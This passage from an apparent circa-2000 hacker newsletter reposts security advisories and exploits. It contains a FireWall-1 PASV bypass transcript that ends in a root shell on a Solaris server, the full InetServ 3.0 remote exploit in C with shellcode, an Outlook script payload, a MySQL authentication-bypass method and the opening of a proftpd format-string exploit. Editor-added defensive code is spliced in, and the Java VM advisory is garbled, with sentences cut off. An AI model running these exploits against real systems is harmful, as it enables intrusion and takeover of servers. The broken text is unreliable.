Data can only travel in one direction and it cannot be to a port that is listed in FireWall-1's list of well-known TCP services. It is important to note that FireWall-1 version 3 does not have this limitation: connections can be made to any port, and the flow of data is not managed.

In order to trick FireWall-1 into allowing a connection to a port on the FTP server, we must have the server send the "227 " string as the first four bytes in a packet that, according to its source port, belongs to an FTP control connection. We can typically accomplish this by using the error handler of the FTP daemon, in conjunction with limiting the MSS of our TCP connection. This is easy to do by setting the MTU of our interface to a small value we can work with, before we establish a control connection to the victim FTP server. This causes the return packets from the server to be smaller, allowing us to control more easily how data is split into packets. Thus, we can make the "227 " message returned by the error handler appear at the beginning of a packet. Another way to accomplish this would be to ACK up to the message we want to receive, and then have the server retransmit the data we want to be contained in an isolated packet.

Here is an example of an attack based on this technique. There is a FireWall-1 machine between gumpe and the 172.16.0.2 server, which only permits incoming FTP connections. 172.16.0.2 is a default Solaris 2.6 install, with the Tooltalk Database vulnerability. We send the datagram directly to the service's TCP port, in spite of this port being blocked by the firewall. Note that since there is no response expected, the one-way restriction doesn't affect this attack. All of our testing was done on a Nokia IPSO machine running FW-1 version 4.0.SP-4.
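Before the authors' session transcript, here is an added example (not code from the paper, nor from Check Point) of what the 227 check looks like when it reassembles the control channel into lines and ties each 227 reply to a PASV the client actually sent, next to the per-packet check described above. The server address and the packet boundaries are constructed to mirror the session described in the paper.

```python
"""Stateful handling of FTP "227" passive-mode replies.

Added example, not code from the paper or from FireWall-1. It contrasts the
per-packet check the paper describes (trust any server->client packet that
begins with "227 ") with a check that reassembles the control channel into
lines, only honours a 227 line that answers a PASV the client actually sent,
and requires the advertised address to be the server's own. Addresses and
packet boundaries below are constructed to mirror the session in the paper.
"""
import re

# 227 reply grammar from RFC 959: "227 ... (h1,h2,h3,h4,p1,p2)"
PASV_REPLY = re.compile(
    r"^227 .*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def parse_227(line):
    """Return (ip, port) from a 227 line, or None if it does not fit the grammar."""
    m = PASV_REPLY.match(line)
    if not m:
        return None
    vals = [int(x) for x in m.groups()]
    if any(v > 255 for v in vals):
        return None
    return "%d.%d.%d.%d" % tuple(vals[:4]), vals[4] * 256 + vals[5]


def naive_pinhole(server_ip, packet):
    """The check as the paper describes it: each server->client packet is
    judged on its own, and one that starts with "227 " opens a pinhole."""
    if not packet.startswith(b"227 "):
        return None
    parsed = parse_227(packet.decode("latin-1"))
    if parsed is not None and parsed[0] == server_ip:
        return parsed
    return None


class StatefulPasvInspector:
    """Reassembles both directions of the control channel and opens a pinhole
    only for a complete "227" line that answers a pending client PASV."""

    def __init__(self, server_ip):
        self.server_ip = server_ip
        self._to_server = b""
        self._to_client = b""
        self.pasv_pending = False
        self.pinholes = []          # (ip, port) pairs the firewall would open

    def client_data(self, data):
        self._to_server += data
        while b"\r\n" in self._to_server:
            line, self._to_server = self._to_server.split(b"\r\n", 1)
            if line.strip().upper() == b"PASV":
                self.pasv_pending = True

    def server_data(self, data):
        opened = []
        self._to_client += data
        while b"\r\n" in self._to_client:
            line, self._to_client = self._to_client.split(b"\r\n", 1)
            if not self.pasv_pending:
                continue            # nobody asked for a data port: ignore
            text = line.decode("latin-1")
            if not text.startswith("227"):
                continue            # a 500 error echoing "227 (...)" is just data
            parsed = parse_227(text)
            if parsed is None or parsed[0] != self.server_ip:
                continue            # malformed, or pointing at another host
            self.pasv_pending = False   # one PASV buys exactly one pinhole
            self.pinholes.append(parsed)
            opened.append(parsed)
        return opened


def run_scenarios():
    """Constructed traffic: one real PASV exchange, then the error-handler
    echo delivered in small pieces the way a reduced MTU would split it."""
    server = "172.16.0.2"
    insp = StatefulPasvInspector(server)

    insp.client_data(b"PASV\r\n")
    legit = insp.server_data(b"227 Entering Passive Mode (172,16,0,2,128,7)\r\n")

    filler = b"." * 43
    bogus = filler + b"227 (172,16,0,2,128,7)" + filler
    insp.client_data(bogus + b"\r\n")
    pieces = [b"500 '" + filler,
              b"227 (172,16,0,2,128,7)",
              filler + b"': command not understood.\r\n"]
    naive = [naive_pinhole(server, p) for p in pieces]
    stateful = []
    for p in pieces:
        stateful += insp.server_data(p)

    # a 227 naming some other host is refused even right after a real PASV
    insp.client_data(b"PASV\r\n")
    elsewhere = insp.server_data(b"227 Entering Passive Mode (10,9,8,7,0,80)\r\n")

    return {"legit": legit, "naive_on_echo": naive,
            "stateful_on_echo": stateful, "other_host": elsewhere}


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(name, result)
```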
[root@gumpe /root]# strings hackfile
localhost
""""3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f /usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd
[root@gumpe /root]# /sbin/ifconfig eth0 mtu 100
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................

[1]+  Stopped                 nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open
 sent 80, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................

[2]+  Stopped                 nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 32775 (?) open
 sent 1168, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed: (UNKNOWN) [172.16.0.2] 21 (?) open
id
uid=0(root) gid=0(root)

There is an easier way to perform a similar attack on this setup, since the default Solaris FTP daemon allows a bounce attack, but this should suffice to demonstrate the potential severity of this problem.

Summary
-------

If you have an FTP server behind a FireWall-1, it is possible for an attacker to open TCP connections to certain ports on the machine, and perform limited communication with those services. If you are running FireWall-1 version 3, you should consider your FTP server to have no TCP filtering.

Solving this problem is inherently difficult, but there are simple steps to take to minimize this risk. If the machine is properly hardened, i.e.
if there are no services available on it apart from FTP, this vulnerability has little significance. You can also disable the PASV handling in the FireWall-1 GUI. However, this breaks your configuration for passive FTP clients.

@HWA

173.0 Fool firewalls into opening their ports with PASV
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

Multiple firewalls: FTP Application Level Gateway "PASV" Vulnerability

Synopsis
--------

It is possible to cause certain firewalls to open up any TCP port of your choice against FTP servers that are "protected" by those firewalls. This is done by fooling the FTP server into echoing "227 PASV" commands out through the firewall.

Known affected firewalls
------------------------

Firewall-1 v3 allows full communication on the opened port
Firewall-1 v4 allows only inbound communication on the opened port

NOTE: THIS IS LIKELY A PROBLEM WITH MANY FIREWALLS, DO NOT TAKE FOR GRANTED THAT YOUR FIREWALL IS SAFE JUST BECAUSE IT IS NOT LISTED HERE

Background
----------

I've had this idea since late '98, but haven't gotten around to doing anything about it. Recently, I posted a "possible vulnerability" to vuln-dev@securityfocus.com, outlining my ideas. This resulted in multiple responses from different people saying that they had experienced attacks like this. It would seem that I should have gone public with my concerns a lot sooner, rather than having people frown upon them in private.
For my original, somewhat unstructured, thought process, entitled "Breaking through FTP ALGs -- is it possible?", see:

http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&msg=389FEB7B.AA290CC7@enternet.se

For an immediate confirmation regarding FW-1 v3 and v4 from John McDonald, jm@dataprotect.com, and a real-life attack, entitled "FireWall-1 FTP Server Vulnerability", see:

http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-02-8&msg=38A1B2D9.3B244FAB@dataprotect.com

[Note: URLs are most likely wrapped]

This attack is most likely to work against stateful inspection firewalls protecting servers. It might also be possible to cause "proxy" like firewalls to open arbitrary ports to protected servers. In the extreme case, albeit a tad unlikely, it may be possible to cause any type of firewall to open arbitrary ports against FTP clients.

Take care, all

--
Mikael Olsson, EnterNet Sweden AB, Box 393, S-891 28 ÖRNSKÖLDSVIK
Phone: +46 (0)660 105 50   Fax: +46 (0)660 122 50   Mobile: +46 (0)70 248 00 33
WWW: http://www.enternet.se   E-mail: mikael.olsson@enternet.se

@HWA

174.0 InetServ 3.0 remote DoS exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

Home page: http://www.raza-mexicana.org

--=0---=0---=0---=0---=0---=0---=0---=0
POWERED by Linux eXtreme V1.1
--=0---=0---=0---=0---=0---=0---=0---=0
RaZa MeXiCaNa TeAm
w w w . r a z a - m e x i c a n a .
o r g
------------------------------------------------------------------
|D3VIL OF THE NET | - | THE FINAL DAY IS HERE|

Hi, sorry, a person posted this exploit made for Win32.
I coded the same exploit, but it compiles on UNIX.

c-u
thx
o r g ------------------------------------------------------------------ |D3VIL OF THE NET | - | THE FINAL DAY IS HERE| -----BEGIN PGP MESSAGE----- Version: 2.6.3i owGtkcFKw0AQhsWT7FP8L5BcvAmCId2SQLKWGCT2YNl2x7La3YVNxFb6Sr6jY0C0 J0HyDf/h/2dght2P8+f1hYmrJ2P7lzMGv0iY6z/5mhI4pUGGJQuoIdGhRM5OjQla jjLU4p+rhNKOrvB99COEdNrufpKbtQ39oU89DaIIjhZ6y/M+CJFMichDiMZ6bUKE oR0WMRxoMwRU1r/uQd0QyZFo9FKjps7mWmm0lDngbawUERrvrAQOhD0sNuw8K0Xg 7naCk0//ZnZ5X1a4naMtJJRsceTlx9HNS5VVmGUPKO9QyEZO+14Qnw== =An72 -----END PGP MESSAGE-----</pre> </html> --------------63FC237A4CB8A83445A20326-- --------------B105FA723A5B39CE8CFB14A1 Content-Type: text/plain; charset=us-ascii; name="inetserv-exp.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="inetserv-exp.c" /********************************************************************** InetServ 3.0 (Windows NT) REMOTE EXPLOIT CODEd by dr_fdisk^ *********************************************************************** CLASE: DENIAL OF SERVICE BUG/SHELLCODE FOUND by: Greg Hoglund ))))))))))))(((((((((((( )))RaZa MeXiCaNa TeAm((( ))))))))))))(((((((((((( w w w . r a z a - m e x i c a n a . o r g (((((((((((((((((((((((((((((((((((((((((( ************************************************************************ Aclaracion: el exploit lo programe porque lo necesitaba usar bajo Unix y no en entorno Windows como fue presentado. 
************************************************************************/ /*********************************************************************** -----BEGIN PGP MESSAGE----- Version: 2.6.3i owGtkMFKw0AQhtXjPsX3AimIN9HDkm5pIIkSg8QeKmt3lUWThbVilb6S7+iYkz0J km/4D//MwAz/18nFw/HpkcAvMuHyT362FIc0aFYiqDB0FOTi6rFDKy1Npf55StW2 9+e4dP/owuvzGqWyKVF5jMmFwbqYcP6F6xQ//GYbKcPwtsN32+R7rxq7slS+C7mt La3XPbyPNSNh+RRl9Hh2BDbiBtGMKNOnCV4+zHx+dluUXC1ol4batOzl+H50i6LW JXN9R3HD0jRm2rwk/28= =92LB -----END PGP MESSAGE----- ************************************************************************/ /*------------------------------* * DEFINIR EL PUERTO DEFAULT */ /*------------------------------*/ #define PUERTO 224 #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> /*------------------------------* * COLORES DEFINIDOS */ /*------------------------------*/ #define NORMAL "\E[m" #define VERDE "\E[32m" #define BRILLOSO "\E[1m" #define ROJO "\E[31m" #define CELESTE "\E[36m" #define AZUL "\E[34m" char shellcode[] = "GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \ "AAAAAAAAAAAAAAAAAAAAAAAAAAADDDDAAAAEEEEAAAAAAAAAAA" \ "\xB8\xFF\x1F\xED\x12\x2C\xFF\xC1\xC0\x18\x8B\xD8" \ "\x33\xC9\xB1\x46\x48\x80\x30\x80\x49\x75\xF9" \ "\x53\xB8\x48\x77\x78\x77\xBA\x77\x77\x77\x77" \ "\x33\xC2\x50\x33\xC0\x50\xB8\xAE\x9B\x65\x77\x33\xC2\x50" "\xB8\x75\x77\x77\xF7\x33\xC2\x50\xB8\x7B\xA7\x34\x77" \ "\x33\xC2\xFF\x10\x8B\xFB\xBA\x77\x77\x77\x77" \ "\xB8\x63\x9A\x65\x77\x33\xC2\x2B\xD8\x53\x50" \ "\x6A\x01\x33\xC9\x51\xB8\x70\x9A\x65\x77" \ "\x33\xC2\x50\xFF\x37\xB8\x77\xA7\x34" \ "\x77\x33\xC2\xFF\x10\xCC"\ "AAAAAAAAAAAAAAA" \ 
"\x90\x90\xEB\x80\xEB\xD9\xF9\x77" \ "\xDC\xD3\xCF\xC6\xD4\xD7\xC1\xD2\xC5\xDC\xCD\xE9\xE3\xF2" \ "\xEF\xF3\xEF\xE6\xF4\xDC\xD7\xE9\xEE\xE4\xEF\xF7\xF3\xDC\xC3" \ "\xF5\xF2\xF2\xE5\xEE\xF4\xD6\xE5\xF2\xF3\xE9\xEF\xEE\xDC" \ "\xD2\xF5\xEE\x80" \ "\xDF\xD5\xD2\xDF\xC8\xC1\xD8\xCF\xD2\xC5\xC4\xDF\x80" \ "\xE3\xED\xE4\xAE\xE5\xF8\xE5\xA0\xAF\xE3\x80\x80\x80\x80\x80"; void victima(char *conn22); int conexion; void victima(char *conn22) { struct sockaddr_in sin; struct hostent *hp; hp = gethostbyname(conn22); if (hp==NULL) { printf("%s%sEl host %s no existe!!!!\n",ROJO,BRILLOSO,conn22); exit(0); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(PUERTO); conexion = socket(AF_INET, SOCK_STREAM, 0); connect(conexion,(struct sockaddr *) &sin, sizeof(sin)); } void main(int argc, char **argv) { char buffer[1500]; int a; char salida[50]; if (argc != 2) { system("clear"); printf("\n\n\n\n"); printf("%s%s InetServ 3.0 (Windows NT) REMOTE EXPLOIT CODEd by dr_fdisk^\n",VERDE,BRILLOSO); printf("%s----------------------------------------------------------------------\n\n",CELESTE); printf ("%s RaZa MeXiCaNa TeAm %swww.raza-mexicana.org\n\n",ROJO,CELESTE); printf ("-------===============================-------\n\n\n"); printf("Uso: %s%s <hostname>\n\n",AZUL,argv[0]); exit(0); } printf("%s%sVictima: %s \n"NORMAL,ROJO,BRILLOSO,argv[1]); printf("%s----------------------------------------------------"NORMAL,AZUL); victima(argv[1]); sprintf(buffer,"%s",shellcode); send(conexion, buffer, strlen(buffer), 0); printf("%s%s%sTHE END\n\n",NORMAL,VERDE,BRILLOSO); } /*********************************THE END************************************/ @HWA 175.0 ppp 1.6.14 shows local user the saved PPP password ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: here exists a bug in kppp 1.6.14 where a local user dialing up into the internet can copy the stars in the password box and put them into 
an xterm where the stars will be unrevealed and that password will be shown. seeya rarez rarez@bonbon.net (Seems unlikely, like Revelation?? -Ed) @HWA 176.0 Another screw up in MS's Java Virtual Machine, breaks security. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Jan 28, 2000 Translator's note: We announce another security hole of Microsoft Virtual Machine$B!!(B (Microsoft VM) for Java, including the latest version. This is the translation version of the warning note (written in Japanese) by Dr. Hiromitsu Takagi posted at the Java House Mailing List, a Japanese Java user discussion site (http://java-house.etl.go.jp/ml/ . Japanese fonts required to display). The finding is summarized after numerical tests and discussion among the members. Mr. Kensuke Tada originated the discussion. The translation is made available by Dr. Tomohira Tabata (ttabata@ucsd.edu) for his friends and others who may be benefit from the information. Please note that Dr. Tomohira Tabata has no responsibility on mistranslation on this document. The finding is: This security vulnerability allows a Java applet to read out any files on certain directories. A simple code attacks the security hole. Since a beginning Java programmer can exercise one, all users should be noted. Its vulnerability is quite dangerous and immediate de-activation of IE Java function provided by Microsoft is highly recommended; possibly changing to Netscape Navigator, Communicator or Sun Java Plug-in by the time Microsoft providing a "fix". The body of the warning note by Dr. Hiromitsu Takagi: ---------------------------------------------------------------------------------------------------------- This is a warning for all users of Microsoft Internet Explorer version 4 and 5 (IE4, IE5) for Microsoft Windows95/98/NT. This security hole is closely CLASSPATH for Java users and especially for the Java Developer; the note is posted. 
Vulnerability ------------- This security vulnerability allows a Java applet to read any "known files", which are common to most configuration. A hosted web site is able to retrieve file information through the applet code automaticallyspecific files which popular applications hold, and files with common names which users occasionally choose, This does not allow any change or deletion of local files. We still believe this vulnerability is quite dan Detail description ------------------ The readable directories and their sub directories could be limited,will be read, Except of Windows NT that is home directory of each user profile set. C:\Windows\desktoWe suspect this variation comes from the version of Microsoft VM for Java, not the version of IE. Unfortunately as a much serious case, if you set the environment variable CLASSPATH at C:\AUTOEXEC.BAT, the files and directories under the directories set in CLASSPATH are all readable. Java programmers should be aware of tfor their applications. How to be attacked ------------------ You may get attacked indeed just accessing When accessing the web site, the applet is downloaded and invoked on your computer, and then sends files on InputStream is = ClassLoader.getSystemResourceAsStream(filename); This single line makes an applet read an email. There would be already such an applet made by a malicious programmer, and placed on a web page in secret. Demonstration of attacking the security hole -------------------------------------------- You can try a demonstration applet on the following URL, (don't worry, it just reads you back your e.g. autoexec.bwill see the content with specifying the file name with the directory name. When you receive the message "to read or find the specified file. However, this might means only that the applet searched the different d(rive?) Work-around ----------- Stop Microsoft's Java function until a patch provided. 
Instruction for IE4 users: Follow "View" menu, "Internet Options...", "Security" tab, "Custom (for expert users)", and "Setting..." bAlternative for utilizing Java: - Use Netscape Navigator or Communicator instead of IE. - Use Sun Java Plug-in for IE. See http://java.sun.com/products/plugin/index.html List of vulnerable applications with versiothe members ------------------------------------------------------------------------------------ Microsoft (R) VM for Java, 5.0 Release 5.0.0.3234 (the latest version, as of Jan 28, 2000) and earlier Note that no sNo. This is a simple mis-implementation (a bug) of Microsoft Java VM. It does NOT mean Java has a structural Motivation of this note ----------------------- We are aware that full disclosure of security holes informpeople informed. After fighting this dilemma, we believe the benefit of users, such as awareness of existing(See the following URLs). http://www.news.com/News/Item/0,4,41084,00.html?feed.cnetbriefs http://news.cnet.c - This issue is already known by thousands of members of our mailing list. Even if we hid the code, anyone them to provide a patch immediately, and to announce it on media such as newspaper so that all of Windows us The following is the Microsoft's response; -- Due to development issue, we can not guarantee to fix it as From this answer, we could not be convinced if users get secured soon. In addition, they mentioned they coulthis issue to Java communities (Translator's note: Dr. Takagi gave Microsoft Corp. in Japan a call on Jan 2Acknowledgement) --------------- This security hole is happened to be found when we discussed programming method to read files on Jar archives. As a start point, Mr. Tada reported his applet read files on Desktop unereport, Mr. Amemiya indicated it was a security hole. I, Dr. 
Takagi, reported readable directories were not Related articles ---------------- [j-h-b:30281] [j-h-b:30283] [j-h-b:30284] [j-h-b:30285] [j-h-b:30303] [j-h-b:30321] [j-h-b:30323] [j-h-b:30324] [j-h-b:30325] [j-h-b:30327] [j-h-b:30331] [j-h-b:30332] [j-h-b:30333] [j-h-b:30334] [j-h-b:30338] [j-h-b:30351] [j-h-b:30352] [j-h-b:30353] [j-h-b:30354] [j-h-b:30355] [j-h-b:3http://www.etl.go.jp/~takagi/ Acknowledgement from translator ------------------------------- I would like to thank Dr. Hiromitsu Takagi (takagi@etl.go.jp) and Mr. Ryoji Sumida (ryo@idt.net) for kind helps. Tomohira Tabata (ttabata@ucsd.edu), Ph.D., postgraduate research engineer, ECE UCSD, 9500 Gilman Drive, La Jolla, CA 92093-0407, USA @HWA 177.0 mySQL password checking routines insecure. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Hi, Below you find a security advisory i wrote concerning a vulnerability found in all (known to me) mysql server versions, including the latest one. As mysql is a widely used sql platform, i strongly advise everyone using it to read it, and fix where appropriate. This email has been bcc'd to the mysql bug list, and other appropriate parties. Greets, Robert van der Meulen/Emphyrio .Introduction. There exists a vulnerability in the password checking routines in the latest versions of the MySQL server, that allows any user on a host that is allowed to connect to the server, to skip password authentication, and access databases. For the exploit to work, a valid username for the mysql server is needed, and this username must have access to the database server, when connecting from the attacking host. .Vulnerable Systems. All systems running 3.22.26a and up (tested). Probably all systems running lower versions as well (not tested, not reviewed). All versions are vulnerable on all platforms. 
.A snippet of code from the mysql code, explaining password authentication.

From mysql-3.22.26a/sql/password.c:

/* password checking routines */
/*****************************************************************************
  The main idea is that no password are sent between client & server on
  connection and that no password are saved in mysql in a decodable form.

  On connection a random string is generated and sent to the client.
  The client generates a new string with a random generator inited with
  the hash values from the password and the sent string.
  This 'check' string is sent to the server where it is compared with
  a string generated from the stored hash_value of the password and the
  random string.

  <cut>
*****************************************************************************/

.More code, and vulnerability explanation.

The problem is, that in the comparison between the 'check' string, and the string generated from the hash_value of the password and the random string, the following code is used (from mysql-3.22.26a/sql/password.c):

  while (*scrambled)
  {
    if (*scrambled++ != (char) (*to++ ^ extra))
      return 1;                                   /* Wrong password */
  }

'scrambled' represents the 'check' value, and (*to++ ^ extra) walks through the hash_value.

Suppose a client would send a _single_ character to the server as the 'check' string. Of course the server should notice the check string is not the same length as the check string needed, and give a password error. Because no such checks are done, when a check string of length 1 is passed to the server, only one character is compared.

So the only thing that remains to know if we want to peek in someone's MySQL database, is a technique to find out the first character of the server-side check string. The string that's used for the comparison is generated using some random data, so two following authenticate-actions will probably use different check-strings.

After looking at the algorithm generating the check string, it becomes clear that there are actually only 32 possibilities for each character. In practice, this means that if you connect, sending one single character as the check string, you will be in, in about 32 tries maximum.

.Impact.

Hosts in the access list (by default any host, on a lot of distributions and servers) can connect to the MySQL server, without a password, and access (often sensitive) data _as long as the attacker has a valid username for the database server_. This vulnerability also incorporates a MySQL DoS attack, as the attacker can shut down database servers and delete data, if she logs in with the MySQL management account.

.Exploit information.

I have an exploit available, but to deter script kiddies I will not release it (yet). Do not ask me for it. If the above explanation is understood, an exploit should be easy enough...

.Fix information.

Change the routine 'check_scramble' in mysql-3.22.26a/sql/password.c to do a length check, _before_ starting the compare. This should be as easy as inserting the following just above the while (*scrambled) loop:

  if (strlen(scrambled)!=strlen(to)) {
    return 1;
  }

WARNING: This is NOT an official fix. You can use this as a temporary solution to the problem. Please check the official mysql site (www.mysql.org) for a fix.

.Commentary.

I think this exploit should not be a very scary thing to people that know how to secure their servers. In practice, there's almost never a need to allow the whole world to connect to your SQL server, so that part of the deal should be taken care of. As long as your MySQL ACL is secure, this problem doesn't really occur (unless your database server doubles as a shell server).

We have also located several other security bugs in mysql server/client. These bugs can only be exploited by users who have a valid username and password. We will send these to the mysql maintainers, and hope they'll come with a fix soon.
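The quoted comparison beside the advisory's length check, as an added example (editor's code, not MySQL's and not the advisory author's). It models check_scramble on constructed values: 'to' is an 8-byte server-side string drawn from the 32-symbol alphabet the advisory mentions (bytes 64..95 here, an assumption; the real generator is not reproduced) and 'extra' a small XOR byte; the fixed version also compares in fixed time, which goes beyond the one-line fix above.

```c
/* Added example (editor's code, not MySQL's): a model of the check_scramble
 * comparison quoted from mysql-3.22.26a/sql/password.c, beside a version
 * with the advisory's length check. All values below are constructed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The comparison as quoted: walks 'scrambled' (the client's check string)
 * and stops at its NUL, so a shorter check string is only compared over
 * its own length. Returns 0 when accepted, 1 when rejected. */
int check_scramble_vulnerable(const char *scrambled, const char *to, char extra)
{
    while (*scrambled) {
        if (*scrambled++ != (char)(*to++ ^ extra))
            return 1;                       /* Wrong password */
    }
    return 0;
}

/* Same comparison with the advisory's length check first, plus a fixed-time
 * compare over the full length (the latter goes beyond the advisory's fix). */
int check_scramble_fixed(const char *scrambled, const char *to, char extra)
{
    size_t n = strlen(to);
    unsigned char diff = 0;
    size_t i;

    if (strlen(scrambled) != n)
        return 1;                           /* length mismatch: wrong password */
    for (i = 0; i < n; i++)
        diff |= (unsigned char)scrambled[i] ^ (unsigned char)(to[i] ^ extra);
    return diff != 0;
}

/* What a legitimate client sends in this model: to[i] ^ extra for every
 * byte. Returns 0, or -1 if the output buffer is too small. */
int expected_check(const char *to, char extra, char *out, size_t outlen)
{
    size_t n = strlen(to);
    size_t i;

    if (outlen < n + 1)
        return -1;
    for (i = 0; i < n; i++)
        out[i] = (char)(to[i] ^ extra);
    out[n] = '\0';
    return 0;
}

/* Measures the weakness the advisory describes: offer each of the 32
 * alphabet bytes (assumed range 64..95) as a one-byte check string and
 * count attempts until 'check' accepts. Returns the attempt count, or -1
 * if all 32 are rejected. */
int single_byte_attempts(int (*check)(const char *, const char *, char),
                         const char *to, char extra)
{
    char probe[2] = { 0, 0 };
    int c;

    for (c = 64; c < 96; c++) {
        probe[0] = (char)c;
        if (check(probe, to, extra) == 0)
            return c - 64 + 1;
    }
    return -1;
}

int main(void)
{
    const char *to = "KTQXPYHG";            /* constructed server-side string */
    const char extra = 7;                   /* constructed XOR byte */
    char good[16];

    expected_check(to, extra, good, sizeof good);
    printf("correct check string: %s\n", good);
    printf("full string   vulnerable=%d fixed=%d\n",
           check_scramble_vulnerable(good, to, extra),
           check_scramble_fixed(good, to, extra));
    printf("one byte      vulnerable accepts after %d tries, fixed after %d\n",
           single_byte_attempts(check_scramble_vulnerable, to, extra),
           single_byte_attempts(check_scramble_fixed, to, extra));
    /* The quoted loop never runs for an empty check string, so it returns 0. */
    printf("empty string  vulnerable=%d fixed=%d\n",
           check_scramble_vulnerable("", to, extra),
           check_scramble_fixed("", to, extra));
    return 0;
}
```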
Yours, Robert van der Meulen/Emphyrio (rvdm@cistron.nl) Willem Pinckaers (dvorak@synnergy.net) -- | rvdm@cistron.nl - Cistron Internet Services - www.cistron.nl | | php3/c/perl/html/c++/sed/awk/linux/sql/cgi/security | | My statements are mine, and not necessarily cistron's. | @HWA 178.0 Guninski: Outlook and Active Scripting (again, sigh...) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Georgi Guninski security advisory #6, 2000 Outlook Express 5 vulnerability - Active Scripting may read email messages Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Outlook Express 5.01 and Internet Explorer 5.01 under Windows 95 (suppose other versions are also vulnerable) allow reading subsequently opened email messages after a hostile message is opened. Details: The problem is assigning the document object of the email message to a variable in a newly opened window. Thru this variable access is possible to open email messages. 
The code that must be included in HTML message is : --------------------------------------------------------------------- <SCRIPT> a=window.open("about:<A HREF='javascript:alert(x.body.innerText)' >Click here to see the active message</A>"); a.x=window.document; </SCRIPT> --------------------------------------------------------------------- Workaround: Disable Active Scripting Regards, Georgi Guninski http://www.nat.bg/~joro @HWA 179.0 Break a BeOS poorman server remotely with url infusion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Missing traling '/' Remote Denial of Service Attack Advisory [february 5th 2000] UPDATED February 8th ############################################################### Please, refer to http://bebugs.be.com/devbugs/detail.php3?oid=1229984 as it makes this advisory obsolete... I discovered this very recently, but it seems it was in the Be inc. bug database for a while. Thanks goes to Kobie Lurie for giving me additional informations. ############################################################### ##### OLD ADVISORY HERE ##### Software: PoorMan webserver Platform: BeOS R4.5 (i386) Note: The following has not been test over the PPC platform, please, let me know if you are able the reproduce it! Author: Jonathan Provencher oktober@balistik.net http://balistik.net Details: It is possible to cause the PoorMan webserver to crash (remotly)by sending a given URL to the server. In the case that interests us, a URL like http://server.com/somedir would make the server crash and output a Segment Violation in the 'web connection thread'. It seems it is the way that the server handles and parse the urls that makes him vulnerable. Adding a trailing '/' would not make the server to crash. I discovered this very recently, but it seems it was in the Be inc. bug database for a while. Thanks goes to Kobie Lurie for giving me additional informations. Sorry for any redundant alert! ;) Situation: The vendor (Be inc.) 
has not and will not be contacted for this vulnerability. This DoS can be worked around by installing the 4.5.2 service pack provided freely by Be inc. PoorMan's users should really consider installing this service pack. Relevant links: R4.5.2 Service Pack http://www-classic.be.com/support/updates/ Be inc. http://www.be.com ###################### @HWA 180.0 Proftpd (<= pre6) linux ppc remote exploit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Author: lamagra@uglypig.org Packetstorm: /* PRIVATE Do not distribute PRIVATE oktober 1999 pro-ftpd remote exploit (linux ppc) Bug: Proftpd (<= pre6) passes user commands to snprinft(). snprintf(argv,len,command + host + etc); This makes it possible to insert formatstrings. %n: writes the number of chars written to the location pointed to by it's argument. Stack: [ user argument ] [ other stuff ] [ arguments + stack of the snprintf funtion + subfunctions ] We walk to all that garbage using %u and stop at a certain possition inside the usercommand. At that possition is the address that will be overwritten by %n. Exploit is simple we overwrite the uid and the anonconfig. After a uid change by LIST. We are root :-) Exploit: Linuxppc has a bad char (newline) in the address of session.anonconfig. This is why I overwrite 